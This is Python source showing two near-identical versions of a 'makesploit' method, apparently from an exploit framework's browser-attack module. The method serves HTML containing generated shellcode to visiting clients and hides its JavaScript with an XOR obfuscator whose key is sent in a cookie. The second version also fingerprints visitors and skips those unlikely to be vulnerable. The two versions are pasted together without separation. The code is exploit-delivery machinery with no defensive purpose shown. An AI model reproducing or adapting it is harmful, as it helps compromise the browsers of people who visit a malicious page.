def makesploit(self, clientheader, clientbody): """ Called automatically """ from libs.spkproxy import header, body # header is used to store request and reponse headers header = header('SERVER') body = body() if clientheader.URL.count(self.filename): self.log('Serving HTML file') # Create the shellcode (self.shellcode) self.createShellcode() # Create the HTML Contents html = self.makefile(request_header=clientheader) body.setBody(html) header.addHeader('Content-Type', 'text/html') header.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('Redirecting to self') header.status = '302' header.addHeader('Location', self.filename) header.addHeader('Content-Type', 'text/html') return header, body
def makesploit(self, clientheader, clientbody): from libs.spkproxy import header, body # header is used to store request and reponse headers header=header('SERVER') body=body() # Clientd gives us a lot of information about the remote endpoint if self.plugin_info: # Check if the remote endpoint is vulnerable to our exploit if self.is_vulnerable(self.plugin_info)==0: self.log('Bailing on this client as it is not likely to be vulnerable') #Return a 404 here? return None,None if clientheader.URL.count(self.filename): self.log('%s: Serving HTML file'%self.name) # Create the shellcode (self.shellcode) self.createShellcode() # Create the HTML Contents html=self.makefile(request_header=clientheader) if not html: self.log("%s: Error creating HTML for this exploit"%self.name) return None, None #done body.setBody(html) header.addHeader('Content-Type','text/html') header.addHeader('Set-Cookie','SessionID=%d'%(self.jsObfuscator.getXORKey())) else: self.log('%s: Redirecting to self'%self.name) header.status='302' header.addHeader('Location',self.filename) header.addHeader('Content-Type','text/html') return header,body